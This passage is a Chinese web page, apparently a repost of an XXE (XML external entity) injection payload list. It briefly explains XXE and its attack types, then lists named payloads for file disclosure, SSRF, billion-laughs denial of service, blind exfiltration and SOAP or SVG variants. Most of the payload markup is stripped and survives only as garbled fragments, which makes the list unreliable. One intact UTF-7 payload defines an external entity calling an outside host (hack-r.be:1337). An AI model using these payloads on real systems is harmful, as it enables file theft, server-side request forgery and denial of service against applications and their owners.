XML (XXE) 注入Payload List |
您所在的位置:网站首页 › lol5杀图片 › XML (XXE) 注入Payload List |
XML (XXE) 注入Payload List
|
XML (XXE) 注入Payload List
在本节中,我们将解释什么是XML注入,描述一些常见的示例,解释如何发现和利用各种XXE注入,并总结如何防止XXE注入攻击。 什么是XML注入?XML注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通常使攻击者可以查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。 在某些情况下,攻击者可以利用XXE漏洞执行服务器端请求伪造(SSRF)攻击,从而升级XXE攻击,以破坏底层服务器或其他后端基础结构。  XML (XXE) 注入
XXE攻击有多种类型: XXE Attack TypeDescriptionExploiting XXE to Retrieve FilesWhere an external entity is defined containing the contents of a file, and returned in the application's response.Exploiting XXE to Perform SSRF AttacksWhere an external entity is defined based on a URL to a back-end system.Exploiting Blind XXE Exfiltrate Data Out-of-BandWhere sensitive data is transmitted from the application server to a system that the attacker controls.Exploiting blind XXE to Retrieve Data Via Error MessagesWhere the attacker can trigger a parsing error message containing sensitive data. XML(XXE)注入PayloadsXXE: Basic XML Example 12345 John DoeXXE: Entity Example 123456 John &example;XXE: File Disclosure 123456 John &ent;XXE: Denial-of-Service Example 123456789101112 &lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">>&lol9;XXE: Local File Inclusion Example 1234 &xxe;XXE: Blind Local File Inclusion Example (When first case doesn't return anything.) 12345 &blind;XXE: Access Control Bypass (Loading Restricted Resources - PHP example) 1234 ∾XXE:SSRF ( Server Side Request Forgery ) Example 1234 &xxe;XXE: (Remote Attack - Through External Xml Inclusion) Exmaple 1234 3..2..1...&testXXE: UTF-7 Exmaple 1234 +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA++ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4XXE: Base64 Encoded 1XXE: XXE inside SOAP Example 12345XXE: XXE inside SVG 123参考: 上节《SQL注入Payload List》。https://github.com/payloadbox/xxe-injection-payload-list |
【本文地址】
今日新闻 |
推荐新闻 |